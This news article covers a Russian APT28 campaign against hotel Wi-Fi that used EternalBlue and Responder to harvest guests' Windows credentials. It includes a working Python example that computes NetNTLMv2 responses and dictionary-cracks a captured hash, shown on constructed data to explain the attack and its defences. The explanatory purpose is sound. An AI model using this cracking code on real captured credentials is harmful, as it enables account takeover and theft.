Appropriately paranoid travelers have always been wary of hotel Wi-Fi. Now they have a fresh justification of their worst wireless networking fears: A Russian espionage campaign has used those Wi-Fi networks to spy on high-value hotel guests, and recently started using a leaked NSA hacking tool to upgrade their attacks.
Since as early as last fall, the Russian hacker group known as APT28, or Fancy Bear, has targeted victims via their connections to hacked hotel Wi-Fi networks, according to a new report from security firm FireEye, which has closely tracked the group’s intrusions, including its breach of the Democratic National Committee ahead of last year’s election. Last month, FireEye says, those hackers, believed to be associated with the Russian military intelligence service GRU, began using EternalBlue, the leaked NSA exploit, as one technique to broaden their control of hotel networks after gaining an initial foothold via phishing or other means. Disturbingly, once those hackers control a hotel’s Wi-Fi, they use that access to silently harvest guests’ Windows usernames and password hashes, with a trick that doesn’t require users to type anything once they’re connected to the hotel network.
“It’s definitely a new technique” for the prolific Fancy Bear hacker group, says Ben Read, who leads FireEye’s espionage research team. “It’s a much more passive way to collect on people. You can just sit there and intercept stuff from the Wi-Fi traffic.”
FireEye says it first saw evidence that Fancy Bear might be targeting hotels in the fall of last year, when the company analyzed an intrusion that had started on one corporate employee’s computer. The company traced that infection to the victim’s use of a hotel Wi-Fi network while traveling; 12 hours after the person had connected to that network, someone connected to the same Wi-Fi network had used the victim’s own credentials to log into their computer, install malware on their machine, and access their Outlook data. That implies, FireEye says, that a hacker had been sitting on the same hotel’s network, possibly sniffing its data to intercept the victim’s credentials.
Then, just last month, FireEye learned of a series of similar Wi-Fi attacks at hotels across seven European capitals and one Middle Eastern capital. In each case, hackers had first breached the target hotel’s network, FireEye believes via the common tactic of phishing emails carrying infected attachments that included malicious Microsoft Word macros. They then used that access to launch EternalBlue, the NSA exploit published earlier this year by the hacker group known as the ShadowBrokers as part of a trove of leaked NSA tools. It let them quickly spread through the hotels’ networks via a vulnerability in Microsoft’s Server Message Block (SMB) file-sharing protocol, one Microsoft had patched in March as MS17-010, until they reached the servers managing the corporate and guest Wi-Fi networks.
From there, the attackers used a network-hacking tool called Responder, which let them not only monitor traffic on the hijacked networks but also trick computers connecting to them into coughing up users’ credentials without giving victims any sign of the theft. Windows machines that can’t resolve a hostname through DNS fall back to asking the local network via broadcast protocols such as LLMNR and the NetBIOS Name Service; when a victim laptop reaches out this way for a printer or shared folder, Responder answers that it is that host, then challenges the victim to authenticate. The victim’s machine obligingly replies with its username and an NTLM challenge-response computed from the user’s password hash. What crosses the wire is not the password itself but that response; since the attacker chose the challenge and captured the reply, though, the password can often be recovered offline by guessing candidates and recomputing the response until one matches, and the weaker the password, the faster it falls. (FireEye believes, for instance, that hackers used Responder to steal the hotel guest’s password in the 2016 case; the 12-hour delay may have been the time it took to crack the hash.)
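The following is an added example, written for this article and not code from the Responder project or from FireEye’s analysis, that reconstructs in miniature what a poisoner like Responder captures and why “the hash can sometimes be cracked.” It computes the NetNTLMv2 response a Windows client sends (per the MS-NLMP definitions), writes it out in the USER::DOMAIN:challenge:response:blob form Responder logs, and then recovers the password by dictionary attack. The user “jdoe”, domain “CORP”, password, blob and wordlist are all constructed for the demo; the 1122334455667788 challenge is Responder’s long-standing default.

```python
"""NetNTLMv2 capture and offline crack, in miniature.

Added example for this article; not Responder's code and not FireEye's
analysis. User, domain, password, challenge, blob and wordlist are all
constructed for the demo. Follows the NTLMv2 definitions in MS-NLMP.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib on OpenSSL 3 often lacks md4."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, list(range(16)), (3, 7, 11, 19), 0),
        (g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the old d
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). This value itself never leaves the client."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain (UTF-16LE)."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def ntlmv2_response(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr, the 16 bytes the client actually puts on the wire in AUTHENTICATE_MESSAGE."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def capture_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """What the poisoner logs: USER::DOMAIN:challenge:NTProofStr:blob (hashcat mode 5600 layout)."""
    proof = ntlmv2_response(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the response for each guess and compare."""
    user, _, rest = line.partition("::")
    domain, chal_hex, proof_hex, blob_hex = rest.split(":", 3)
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for guess in wordlist:
        if hmac.compare_digest(ntlmv2_response(guess, user, domain, chal, blob), proof):
            return guess
    return None


if __name__ == "__main__":
    # Constructed scenario: the laptop asks the local network (LLMNR) for a share
    # name, the poisoner answers, and sends CHALLENGE_MESSAGE with this challenge.
    server_challenge = bytes.fromhex("1122334455667788")  # Responder's classic default
    # Simplified NTLMv2 blob: header, reserved, timestamp, client nonce, AV pairs (constructed)
    blob = bytes.fromhex("0101000000000000" + "00d0a0b0c0d0e0f0" + "0b1a2b3c4d5e6f70" + "00000000")
    captured = capture_line("jdoe", "CORP", "Summer2017!", server_challenge, blob)
    print("captured:", captured)
    print("cracked :", crack(captured, ["password", "Welcome1", "Summer2017!"]))
```

Two things to notice: the attacker never needs to relay or decrypt anything, only to pick the challenge and record the reply, and the cost of the attack is entirely the victim’s password strength, which is why a long random passphrase, or disabling LLMNR and NetBIOS name resolution on travelling laptops, is the real defence rather than anything the hotel does.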
In each case, FireEye says that the hacked networks were those of moderately high-end hotels, the kind that attract presumably valuable targets. “These were not super expensive places, but also not the Holiday Inn,” FireEye’s Read says. “They’re the type of hotel a distinguished visitor would stay in when they’re on corporate travel or diplomatic business.”
But FireEye says it doesn’t know whether the hackers had specific visitors in mind, or were simply casting a wide net for potential victims. “Maybe this was designed just to establish a foothold and see who shows up, or maybe they were just testing something out,” says Read. Other than the victim whose case they analyzed last year, the company’s analysts couldn’t confirm any individual victims whose credentials were stolen from the target hotels.
FireEye says it has “moderate confidence” in its conclusion that Fancy Bear conducted both the 2016 hotel attack and the more recent spate. It bases that assessment on the use of two pieces of Fancy Bear-associated malware, known as GameFish and XTunnel, planted on hotel and victim computers. The company also points to clues in the command and control infrastructure of that malware and information about the victims, which it’s not making public.
If Fancy Bear is in fact behind the hotel espionage spree, FireEye notes that the group’s use of EternalBlue would represent the first publicly confirmed time that Russian hackers have used one of the NSA hacking techniques leaked in the ShadowBrokers’ scandal. But the Ukrainian government has already blamed Russia for the creation of the NotPetya malware, which used EternalBlue to spread within victims’ networks as it crippled thousands of companies earlier this summer. (The security firm ESET has also linked NotPetya with a hacking group called TeleBots or Sandworm, which FireEye has tied to Russia.) EternalBlue has also helped enable other hacking epidemics, from the WannaCry ransomware to cryptocurrency-mining malware. That proliferation of a powerful and silent NSA hacking tool has caused controversy for the agency and scrutiny of its suspected stockpile of secret computer intrusion techniques, despite the fact that the NSA helped Microsoft to distribute a patch for the flaw EternalBlue exploited months before it was used in the WannaCry campaign.
The Fancy Bear hotel-hacking campaign would also represent a new evolution of the group’s intrusion techniques, which have been used in everything from stealthy spying campaigns to noisy, disruptive operations, like the data-destroying attack on the French television station TV5Monde, or the leaks from the DNC and Clinton campaigns last year.
But more broadly, sophisticated hackers infiltrating hotels to spy on their guests has happened before. A similar campaign known as DarkHotel, believed to be the work of North Korean cyberspies, came to light in 2014. The Duqu 2.0 malware, widely believed to be the work of Israeli hackers, was found in the networks of European hotels hosting Iranian nuclear negotiations the following year.
All of which should serve as a reminder that hotel networks are not safe havens for travelers with sensitive information. FireEye’s Read warns that even using a VPN may not prevent the credential leakage Responder exploits: the name-resolution broadcasts it answers go out on the local hotel network, not through the tunnel, and he notes that whether a client blocks that traffic likely depends on which VPN software someone is using and how it is configured. But the safest approach, for any traveler with truly valuable secrets to keep, is to bring your own wireless hotspot, and then stay off the hotel’s Wi-Fi altogether.